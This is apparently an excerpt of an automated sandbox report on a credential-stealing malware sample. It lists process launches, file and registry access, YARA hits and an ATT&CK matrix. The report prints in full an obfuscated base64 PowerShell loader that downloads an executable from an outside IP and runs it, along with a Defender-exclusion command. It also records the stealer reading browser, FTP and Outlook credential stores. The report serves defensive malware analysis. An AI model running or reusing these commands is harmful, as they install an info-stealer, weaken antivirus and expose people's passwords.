                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNtJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\wininit.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00406069 GetUserNameW,18_2_00406069
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000012.00000002.654667913.0000000000534000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\AppData\Roaming\wininit.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: PopPassword18_2_0040D069
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: SmtpPassword18_2_0040D069
                Source: Yara matchFile source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts33
                Exploitation for Client Execution
                1
                Scripting
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services1
                Archive Collected Data
                35
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                1
                Deobfuscate/Decode Files or Information
                2
                Credentials in Registry
                2
                File and Directory Discovery
                Remote Desktop Protocol1
                Browser Session Hijacking
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts3
                PowerShell
                Logon Script (Windows)111
                Process Injection
                3
                Obfuscated Files or Information
                Security Account Manager14
                System Information Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Install Root Certificate
                NTDS1
                Security Software Discovery
                Distributed Component Object Model11
                Email Collection
                125
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets1
                Process Discovery
                SSH1
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                System Owner/User Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                Remote System Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
